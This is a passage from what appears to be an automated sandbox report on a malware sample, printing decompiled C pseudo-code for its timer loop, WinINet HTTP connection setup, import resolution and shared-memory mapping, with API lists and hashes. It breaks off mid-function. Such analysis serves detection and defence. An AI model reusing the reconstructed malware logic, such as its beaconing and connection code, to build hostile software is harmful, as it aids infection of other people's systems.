                    • API String ID: 3111183435-8415677
                    • Opcode ID: 61c48cf55fa533fb1ca2db045618be1176a2ca507617943edd1dcf770f9ea03d
                    • Instruction ID: f40bd76d8806c3f6ebdd5659479abfb7929900579d0af90d11f2c6ac497ab968
                    • Opcode Fuzzy Hash: 61c48cf55fa533fb1ca2db045618be1176a2ca507617943edd1dcf770f9ea03d
                    • Instruction Fuzzy Hash: 8D916971A00219EFDB21DFA8DC48A9E3BB9FF48754F148058F988D7250DB3A9951DFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 102 10c5458-10c548a memset CreateWaitableTimerA 103 10c560b-10c5611 GetLastError 102->103 104 10c5490-10c54e9 _allmul SetWaitableTimer WaitForMultipleObjects 102->104 105 10c5615-10c561f 103->105 106 10c54ef-10c54f2 104->106 107 10c5573-10c5579 104->107 108 10c54fd 106->108 109 10c54f4 call 10c3399 106->109 110 10c557a-10c557e 107->110 111 10c5507 108->111 117 10c54f9-10c54fb 109->117 113 10c558e-10c5592 110->113 114 10c5580-10c5582 110->114 116 10c550b-10c5510 111->116 113->110 115 10c5594-10c559e CloseHandle 113->115 114->113 115->105 118 10c5512-10c5519 116->118 119 10c5523-10c5550 call 10c3a12 116->119 117->108 117->111 118->119 120 10c551b 118->120 123 10c55a0-10c55a5 119->123 124 10c5552-10c555d 119->124 120->119 125 10c55c4-10c55cc 123->125 126 10c55a7-10c55ad 123->126 124->116 127 10c555f-10c556f call 10c17c0 124->127 129 10c55d2-10c5600 _allmul SetWaitableTimer WaitForMultipleObjects 125->129 126->107 128 10c55af-10c55c2 call 10c5f6a 126->128 127->107 128->129 129->116 132 10c5606 129->132 132->107
                    C-Code - Quality: 83%
                    			E010C5458(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                    				void _v48;
                    				long _v52;
                    				struct %anon52 _v60;
                    				char _v72;
                    				long _v76;
                    				void* _v80;
                    				union _LARGE_INTEGER _v84;
                    				struct %anon52 _v92;
                    				void* _v96;
                    				void* _v100;
                    				union _LARGE_INTEGER _v104;
                    				long _v108;
                    				struct %anon52 _v124;
                    				long _v128;
                    				struct %anon52 _t46;
                    				void* _t51;
                    				long _t53;
                    				void* _t54;
                    				struct %anon52 _t61;
                    				long _t65;
                    				struct %anon52 _t66;
                    				void* _t69;
                    				void* _t73;
                    				signed int _t74;
                    				void* _t76;
                    				void* _t78;
                    				void** _t82;
                    				signed int _t86;
                    				void* _t89;
                    
                    				_t76 = __edx;
                    				_v52 = 0;
                    				memset( &_v48, 0, 0x2c);
                    				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                    				_t46 = CreateWaitableTimerA(0, 1, 0);
                    				_v60 = _t46;
                    				if(_t46 == 0) {
                    					_v92.HighPart = GetLastError();
                    				} else {
                    					_push(0xffffffff);
                    					_push(0xff676980);
                    					_push(0);
                    					_push( *0x10ca2e0);
                    					_v76 = 0;
                    					_v80 = 0;
                    					L010C818A();
                    					_v84.LowPart = _t46;
                    					_v80 = _t76;
                    					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                    					_t51 =  *0x10ca30c; // 0x2d4
                    					_v76 = _t51;
                    					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                    					_v108 = _t53;
                    					if(_t53 == 0) {
                    						if(_a8 != 0) {
                    							L4:
                    							 *0x10ca2ec = 5;
                    						} else {
                    							_t69 = E010C3399(_t76); // executed
                    							if(_t69 != 0) {
                    								goto L4;
                    							}
                    						}
                    						_v104.LowPart = 0;
                    						L6:
                    						L6:
                    						if(_v104.LowPart == 1 && ( *0x10ca300 & 0x00000001) == 0) {
                    							_v104.LowPart = 2;
                    						}
                    						_t74 = _v104.LowPart;
                    						_t58 = _t74 << 4;
                    						_t78 = _t89 + (_t74 << 4) + 0x38;
                    						_t75 = _t74 + 1;
                    						_v92.LowPart = _t74 + 1;
                    						_t61 = E010C3A12( &_v96, _t75, _t78, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
                    						_v124 = _t61;
                    						if(_t61 != 0) {
                    							goto L17;
                    						}
                    						_t66 = _v92;
                    						_t97 = _t66 - 3;
                    						_v104.LowPart = _t66;
                    						if(_t66 != 3) {
                    							goto L6;
                    						} else {
                    							_v124.HighPart = E010C17C0(_t75, _t97,  &_v72, _a4, _a8);
                    						}
                    						goto L12;
                    						L17:
                    						__eflags = _t61 - 0x10d2;
                    						if(_t61 != 0x10d2) {
                    							_push(0xffffffff);
                    							_push(0xff676980);
                    							_push(0);
                    							_push( *0x10ca2e4);
                    							goto L21;
                    						} else {
                    							__eflags =  *0x10ca2e8; // 0x0
                    							if(__eflags == 0) {
                    								goto L12;
                    							} else {
                    								_t61 = E010C5F6A();
                    								_push(0xffffffff);
                    								_push(0xdc3cba00);
                    								_push(0);
                    								_push( *0x10ca2e8);
                    								L21:
                    								L010C818A();
                    								_v104.LowPart = _t61;
                    								_v100 = _t78;
                    								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                    								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                    								__eflags = _t65;
                    								_v128 = _t65;
                    								if(_t65 == 0) {
                    									goto L6;
                    								} else {
                    									goto L12;
                    								}
                    							}
                    						}
                    						L25:
                    					}
                    					L12:
                    					_t82 =  &_v72;
                    					_t73 = 3;
                    					do {
                    						_t54 =  *_t82;
                    						if(_t54 != 0) {
                    							HeapFree( *0x10ca2d8, 0, _t54);
                    						}
                    						_t82 =  &(_t82[4]);
                    						_t73 = _t73 - 1;
                    					} while (_t73 != 0);
                    					CloseHandle(_v80);
                    				}
                    				return _v92.HighPart;
                    				goto L25;
                    			}

                    APIs
                    • memset.NTDLL ref: 010C5472
                    • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 010C547E
                    • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 010C54A6
                    • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 010C54C6
                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,010C66F1,?), ref: 010C54E1
                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,010C66F1,?,00000000), ref: 010C5588
                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,010C66F1,?,00000000,?,?), ref: 010C5598
                    • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 010C55D2
                    • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 010C55EC
                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 010C55F8
                      • Part of subcall function 010C3399: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,037A93D8,00000000,?,74E5F710,00000000,74E5F730), ref: 010C33E8
                      • Part of subcall function 010C3399: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,037A9410,?,00000000,30314549,00000014,004F0053,037A93CC), ref: 010C3485
                      • Part of subcall function 010C3399: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,010C54F9), ref: 010C3497
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,010C66F1,?,00000000,?,?), ref: 010C560B
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                    • String ID: Ut
                    • API String ID: 3521023985-8415677
                    • Opcode ID: 82fa6b22080f6bdc939999444818bf4447ff3d239517fbc4a832a28c2c83c842
                    • Instruction ID: 93aff575e08a7fec9618e3702bdc810d514135265f9ff2accb7a7f2af7f405f7
                    • Opcode Fuzzy Hash: 82fa6b22080f6bdc939999444818bf4447ff3d239517fbc4a832a28c2c83c842
                    • Instruction Fuzzy Hash: 58518B75608325AFD7209F199C449AFBBE9EB88B64F108A1EF8E4C2190D775D540CFA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 92%
                    			E010C7A34(void* __eax, void* __ecx, long __esi, char* _a4) {
                    				void _v8;
                    				long _v12;
                    				void _v16;
                    				void* _t34;
                    				void* _t38;
                    				void* _t40;
                    				char* _t56;
                    				long _t57;
                    				void* _t58;
                    				intOrPtr _t59;
                    				long _t65;
                    
                    				_t65 = __esi;
                    				_t58 = __ecx;
                    				_v16 = 0xea60;
                    				__imp__( *(__esi + 4));
                    				_v12 = __eax + __eax;
                    				_t56 = E010C63FD(__eax + __eax + 1);
                    				if(_t56 != 0) {
                    					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
                    						E010C17AB(_t56);
                    					} else {
                    						E010C17AB( *(__esi + 4));
                    						 *(__esi + 4) = _t56;
                    					}
                    				}
                    				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
                    				 *(_t65 + 0x10) = _t34;
                    				if(_t34 == 0 || InternetSetStatusCallback(_t34, E010C79C9) == 0xffffffff) {
                    					L15:
                    					return GetLastError();
                    				} else {
                    					ResetEvent( *(_t65 + 0x1c));
                    					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
                    					 *(_t65 + 0x14) = _t38;
                    					if(_t38 != 0 || GetLastError() == 0x3e5 && E010C5867( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
                    						_t59 =  *0x10ca320; // 0x26dd5a8
                    						_t15 = _t59 + 0x10cb743; // 0x544547
                    						_v8 = 0x84404000;
                    						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65);
                    						 *(_t65 + 0x18) = _t40;
                    						if(_t40 == 0) {
                    							goto L15;
                    						}
                    						_t57 = 4;
                    						_v12 = _t57;
                    						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
                    							_v8 = _v8 | 0x00000100;
                    							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
                    						}
                    						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
                    							goto L15;
                    						} else {
                    							return 0;
                    						}
                    					} else {
                    						goto L15;
                    					}
                    				}
                    			}

                    APIs
                    • lstrlen.KERNEL32(?,00000008,74E04D40), ref: 010C7A46
                      • Part of subcall function 010C63FD: RtlAllocateHeap.NTDLL(00000000,00000000,010C28D5), ref: 010C6409
                    • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 010C7A69
                    • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 010C7A91
                    • InternetSetStatusCallback.WININET(00000000,010C79C9), ref: 010C7AA8
                    • ResetEvent.KERNEL32(?), ref: 010C7ABA
                    • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 010C7ACD
                    • GetLastError.KERNEL32 ref: 010C7ADA
                    • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 010C7B20
                    • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 010C7B3E
                    • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 010C7B5F
                    • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 010C7B6B
                    • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 010C7B7B
                    • GetLastError.KERNEL32 ref: 010C7B85
                      • Part of subcall function 010C17AB: HeapFree.KERNEL32(00000000,00000000,010C2976,00000000,?,?,00000000), ref: 010C17B7
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                    • String ID:
                    • API String ID: 2290446683-0
                    • Opcode ID: 1c4bd35a5e8c21c46c334a569eec0e18482ce0930a3339f27f08900e35f8098d
                    • Instruction ID: e2f1efb3752f1423db3bf26749231e34cf5e6fecf32676f8d8457b53a63a17fa
                    • Opcode Fuzzy Hash: 1c4bd35a5e8c21c46c334a569eec0e18482ce0930a3339f27f08900e35f8098d
                    • Instruction Fuzzy Hash: E1414D71600204BFE7319FA9DC48E9F7ABDEF84B44B10496DF682D2191E775A544CF21
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 189 10c7e75-10c7eda 190 10c7edc-10c7ef6 RaiseException 189->190 191 10c7efb-10c7f25 189->191 192 10c80ab-10c80af 190->192 193 10c7f2a-10c7f36 191->193 194 10c7f27 191->194 195 10c7f38-10c7f43 193->195 196 10c7f49-10c7f4b 193->196 194->193 195->196 204 10c808e-10c8095 195->204 197 10c7f51-10c7f58 196->197 198 10c7ff3-10c7ffd 196->198 202 10c7f68-10c7f75 LoadLibraryA 197->202 203 10c7f5a-10c7f66 197->203 200 10c7fff-10c8007 198->200 201 10c8009-10c800b 198->201 200->201 205 10c800d-10c8010 201->205 206 10c8089-10c808c 201->206 207 10c7fb8-10c7fc4 InterlockedExchange 202->207 208 10c7f77-10c7f87 GetLastError 202->208 203->202 203->207 210 10c80a9 204->210 211 10c8097-10c80a4 204->211 213 10c803e-10c804c GetProcAddress 205->213 214 10c8012-10c8015 205->214 206->204 217 10c7fec-10c7fed FreeLibrary 207->217 218 10c7fc6-10c7fca 207->218 215 10c7f89-10c7f95 208->215 216 10c7f97-10c7fb3 RaiseException 208->216 210->192 211->210 213->206 220 10c804e-10c805e GetLastError 213->220 214->213 219 10c8017-10c8022 214->219 215->207 215->216 216->192 217->198 218->198 221 10c7fcc-10c7fd8 LocalAlloc 218->221 219->213 223 10c8024-10c802a 219->223 225 10c806a-10c806c 220->225 226 10c8060-10c8068 220->226 221->198 222 10c7fda-10c7fea 221->222 222->198 223->213 228 10c802c-10c802f 223->228 225->206 227 10c806e-10c8086 RaiseException 225->227 226->225 227->206 228->213 230 10c8031-10c803c 228->230 230->206 230->213
                    C-Code - Quality: 51%
                    			E010C7E75(long _a4, long _a8) {
                    				signed int _v8;
                    				intOrPtr _v16;
                    				LONG* _v28;
                    				long _v40;
                    				long _v44;
                    				long _v48;
                    				CHAR* _v52;
                    				long _v56;
                    				CHAR* _v60;
                    				long _v64;
                    				signed int* _v68;
                    				char _v72;
                    				signed int _t76;
                    				signed int _t80;
                    				signed int _t81;
                    				intOrPtr* _t82;
                    				intOrPtr* _t83;
                    				intOrPtr* _t85;
                    				intOrPtr* _t90;
                    				intOrPtr* _t95;
                    				intOrPtr* _t98;
                    				struct HINSTANCE__* _t99;
                    				void* _t102;
                    				intOrPtr* _t104;
                    				void* _t115;
                    				long _t116;
                    				void _t125;
                    				void* _t131;
                    				signed short _t133;
                    				struct HINSTANCE__* _t138;
                    				signed int* _t139;
                    
                    				_t139 = _a4;
                    				_v28 = _t139[2] + 0x10c0000;
                    				_t115 = _t139[3] + 0x10c0000;
                    				_t131 = _t139[4] + 0x10c0000;
                    				_v8 = _t139[7];
                    				_v60 = _t139[1] + 0x10c0000;
                    				_v16 = _t139[5] + 0x10c0000;
                    				_v64 = _a8;
                    				_v72 = 0x24;
                    				_v68 = _t139;
                    				_v56 = 0;
                    				asm("stosd");
                    				_v48 = 0;
                    				_v44 = 0;
                    				_v40 = 0;
                    				if(( *_t139 & 0x00000001) == 0) {
                    					_a8 =  &_v72;
                    					RaiseException(0xc06d0057, 0, 1,  &_a8);
                    					return 0;
                    				}
                    				_t138 =  *_v28;
                    				_t76 = _a8 - _t115 >> 2 << 2;
                    				_t133 =  *(_t131 + _t76);
                    				_a4 = _t76;
                    				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                    				_v56 = _t80;
                    				_t81 = _t133 + 0x10c0002;
                    				if(_t80 == 0) {
                    					_t81 = _t133 & 0x0000ffff;
                    				}
                    				_v52 = _t81;
                    				_t82 =  *0x10ca1c0; // 0x0
                    				_t116 = 0;
                    				if(_t82 == 0) {
                    					L6:
                    					if(_t138 != 0) {
                    						L18:
                    						_t83 =  *0x10ca1c0; // 0x0
                    						_v48 = _t138;
                    						if(_t83 != 0) {
                    							_t116 =  *_t83(2,  &_v72);
                    						}
                    						if(_t116 != 0) {
                    							L32:
                    							 *_a8 = _t116;
                    							L33:
                    							_t85 =  *0x10ca1c0; // 0x0
                    							if(_t85 != 0) {
                    								_v40 = _v40 & 0x00000000;
                    								_v48 = _t138;
                    								_v44 = _t116;
                    								 *_t85(5,  &_v72);
                    							}
                    							return _t116;
                    						} else {
                    							if(_t139[5] == _t116 || _t139[7] == _t116) {
                    								L27:
                    								_t116 = GetProcAddress(_t138, _v52);
                    								if(_t116 == 0) {
                    									_v40 = GetLastError();
                    									_t90 =  *0x10ca1bc; // 0x0
                    									if(_t90 != 0) {
                    										_t116 =  *_t90(4,  &_v72);
                    									}
                    									if(_t116 == 0) {
                    										_a4 =  &_v72;
                    										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                    										_t116 = _v44;
                    									}
                    								}
                    								goto L32;
                    							} else {
                    								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                    								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                    									_t116 =  *(_a4 + _v16);
                    									if(_t116 != 0) {
                    										goto L32;
                    									}
                    								}
                    								goto L27;
                    							}
                    						}
                    					}
                    					_t98 =  *0x10ca1c0; // 0x0
                    					if(_t98 == 0) {
                    						L9:
                    						_t99 = LoadLibraryA(_v60); // executed
                    						_t138 = _t99;
                    						if(_t138 != 0) {
                    							L13:
                    							if(InterlockedExchange(_v28, _t138) == _t138) {
                    								FreeLibrary(_t138);
                    							} else {
                    								if(_t139[6] != 0) {
                    									_t102 = LocalAlloc(0x40, 8);
                    									if(_t102 != 0) {
                    										 *(_t102 + 4) = _t139;
                    										_t125 =  *0x10ca1b8; // 0x0
                    										 *_t102 = _t125;
                    										 *0x10ca1b8 = _t102;
                    									}
                    								}
                    							}
                    							goto L18;
                    						}
                    						_v40 = GetLastError();
                    						_t104 =  *0x10ca1bc; // 0x0
                    						if(_t104 == 0) {
                    							L12:
                    							_a8 =  &_v72;
                    							RaiseException(0xc06d007e, 0, 1,  &_a8);
                    							return _v44;
                    						}
                    						_t138 =  *_t104(3,  &_v72);
                    						if(_t138 != 0) {
                    							goto L13;
                    						}
                    						goto L12;
                    					}
                    					_t138 =  *_t98(1,  &_v72);
                    					if(_t138 != 0) {
                    						goto L13;
                    					}
                    					goto L9;
                    				}
                    				_t116 =  *_t82(0,  &_v72);
                    				if(_t116 != 0) {
                    					goto L33;
                    				}
                    				goto L6;
                    			}

                    APIs
                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 010C7EEE
                    • LoadLibraryA.KERNEL32(?), ref: 010C7F6B
                    • GetLastError.KERNEL32 ref: 010C7F77
                    • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 010C7FAA
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: ExceptionRaise$ErrorLastLibraryLoad
                    • String ID: $
                    • API String ID: 948315288-3993045852
                    • Opcode ID: 625b086f8f24ddc0386b678b67d08a5f49e04887c7965aab7acc0e8878157956
                    • Instruction ID: a9c020ce6611a77a71e36bc733f3c118b92cc4b1324b40c5a37b695c5bf774a7
                    • Opcode Fuzzy Hash: 625b086f8f24ddc0386b678b67d08a5f49e04887c7965aab7acc0e8878157956
                    • Instruction Fuzzy Hash: E3813B71A00209DFDB61CFA8D880AADB7F5BB48750F24806EFA85D7240EB75E941CF64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 74%
                    			E010C414A(intOrPtr __edx, void** _a4, void** _a8) {
                    				intOrPtr _v8;
                    				struct _FILETIME* _v12;
                    				short _v56;
                    				struct _FILETIME* _t12;
                    				intOrPtr _t13;
                    				void* _t17;
                    				void* _t21;
                    				intOrPtr _t27;
                    				long _t28;
                    				void* _t30;
                    
                    				_t27 = __edx;
                    				_t12 =  &_v12;
                    				GetSystemTimeAsFileTime(_t12);
                    				_push(0x192);
                    				_push(0x54d38000);
                    				_push(_v8);
                    				_push(_v12);
                    				L010C8184();
                    				_push(_t12);
                    				_v12 = _t12;
                    				_t13 =  *0x10ca320; // 0x26dd5a8
                    				_t5 = _t13 + 0x10cb87e; // 0x37a8e26
                    				_t6 = _t13 + 0x10cb59c; // 0x530025
                    				_push(0x16);
                    				_push( &_v56);
                    				_v8 = _t27;
                    				L010C7DEA();
                    				_t17 = CreateFileMappingW(0xffffffff, 0x10ca34c, 4, 0, 0x1000,  &_v56); // executed
                    				_t30 = _t17;
                    				if(_t30 == 0) {
                    					_t28 = GetLastError();
                    				} else {
                    					if(GetLastError() == 0xb7) {
                    						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                    						if(_t21 == 0) {
                    							_t28 = GetLastError();
                    							if(_t28 != 0) {
                    								goto L6;
                    							}
                    						} else {
                    							 *_a4 = _t30;
                    							 *_a8 = _t21;
                    							_t28 = 0;
                    						}
                    					} else {
                    						_t28 = 2;
                    						L6:
                    						CloseHandle(_t30);
                    					}
                    				}
                    				return _t28;
                    			}

                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,010C65C3,?,?,4D283A53,?,?), ref: 010C4156
                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 010C416C
                    • _snwprintf.NTDLL ref: 010C4191
                    • CreateFileMappingW.KERNELBASE(000000FF,010CA34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 010C41AD
                    • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,010C65C3,?,?,4D283A53,?), ref: 010C41BF
                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 010C41D6
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,010C65C3,?,?,4D283A53), ref: 010C41F7
                    • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,010C65C3,?,?,4D283A53,?), ref: 010C41FF
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                    • String ID:
                    • API String ID: 1814172918-0
                    • Opcode ID: 25d866b7e17e6b9cbf1278c7b710c2ce78648fde4855e0ca865a9b7b5c99877f
                    • Instruction ID: 1459a541475855ed2e59e080356bb94162638355a589677484bbcae02aa53deb
                    • Opcode Fuzzy Hash: 25d866b7e17e6b9cbf1278c7b710c2ce78648fde4855e0ca865a9b7b5c99877f
                    • Instruction Fuzzy Hash: D021A272A00204BFD721AF68CC16FDE3BF9BB88B54F254169FA85E7180DA759505CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 93%
                    			E010C5622(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
                    				void* _t17;
                    				void* _t18;
                    				void* _t19;
                    				void* _t20;
                    				void* _t21;
                    				intOrPtr _t24;
                    				void* _t37;
                    				void* _t41;
                    				intOrPtr* _t45;
                    
                    				_t41 = __edi;
                    				_t37 = __ebx;
                    				_t45 = __eax;
                    				_t16 =  *((intOrPtr*)(__eax + 0x20));
                    				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
                    					E010C5867(_t16, __ecx, 0xea60);
                    				}
                    				_t17 =  *(_t45 + 0x18);
                    				_push(_t37);
                    				_push(_t41);
                    				if(_t17 != 0) {
                    					InternetSetStatusCallback(_t17, 0);
                    					InternetCloseHandle( *(_t45 + 0x18)); // executed
                    				}
                    				_t18 =  *(_t45 + 0x14);
                    				if(_t18 != 0) {
                    					InternetSetStatusCallback(_t18, 0);
                    					InternetCloseHandle( *(_t45 + 0x14));
                    				}
                    				_t19 =  *(_t45 + 0x10);
                    				if(_t19 != 0) {
                    					InternetSetStatusCallback(_t19, 0);
                    					InternetCloseHandle( *(_t45 + 0x10));
                    				}
                    				_t20 =  *(_t45 + 0x1c);
                    				if(_t20 != 0) {
                    					CloseHandle(_t20);
                    				}
                    				_t21 =  *(_t45 + 0x20);
                    				if(_t21 != 0) {
                    					CloseHandle(_t21);
                    				}
                    				_t22 =  *((intOrPtr*)(_t45 + 8));
                    				if( *((intOrPtr*)(_t45 + 8)) != 0) {
                    					E010C17AB(_t22);
                    					 *((intOrPtr*)(_t45 + 8)) = 0;
                    					 *((intOrPtr*)(_t45 + 0x30)) = 0;
                    				}
                    				_t23 =  *((intOrPtr*)(_t45 + 0xc));
                    				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                    					E010C17AB(_t23);
                    				}
                    				_t24 =  *_t45;
                    				if(_t24 != 0) {
                    					_t24 = E010C17AB(_t24);
                    				}
                    				_t46 =  *((intOrPtr*)(_t45 + 4));
                    				if( *((intOrPtr*)(_t45 + 4)) != 0) {
                    					return E010C17AB(_t46);
                    				}
                    				return _t24;
                    			}

                    APIs
                    • InternetSetStatusCallback.WININET(?,00000000), ref: 010C5650
                    • InternetCloseHandle.WININET(?), ref: 010C5655
                    • InternetSetStatusCallback.WININET(?,00000000), ref: 010C5660
                    • InternetCloseHandle.WININET(?), ref: 010C5665
                    • InternetSetStatusCallback.WININET(?,00000000), ref: 010C5670
                    • InternetCloseHandle.WININET(?), ref: 010C5675
                    • CloseHandle.KERNEL32(?,00000000,00000102,?,?,010C1B44,?,?,00000000,00000000,74E481D0), ref: 010C5685
                    • CloseHandle.KERNEL32(?,00000000,00000102,?,?,010C1B44,?,?,00000000,00000000,74E481D0), ref: 010C568F
                      • Part of subcall function 010C5867: WaitForMultipleObjects.KERNEL32(00000002,010C7AF8,00000000,010C7AF8,?,?,?,010C7AF8,0000EA60), ref: 010C5882
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
                    • String ID:
                    • API String ID: 2824497044-0
                    • Opcode ID: 88e16c4d23126a59927ac5e5ed186176d9165701f2adceb33a9679e5316dc0de
                    • Instruction ID: ed3dd342fcc1d89641953824a0f1a24f764b41ab5f1be047718b1a8102401c02
                    • Opcode Fuzzy Hash: 88e16c4d23126a59927ac5e5ed186176d9165701f2adceb33a9679e5316dc0de
                    • Instruction Fuzzy Hash: 2E11173AB00648ABD670AFAAEC84C1FBBF9AF98A403550D5CE1C6D3510C735F8448E64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 100%
                    			E010C13CF(long* _a4) {
                    				long _v8;
                    				void* _v12;
                    				void _v16;
                    				long _v20;
                    				int _t33;
                    				void* _t46;
                    
                    				_v16 = 1;
                    				_v20 = 0x2000;
                    				if( *0x10ca2fc > 5) {
                    					_v16 = 0;
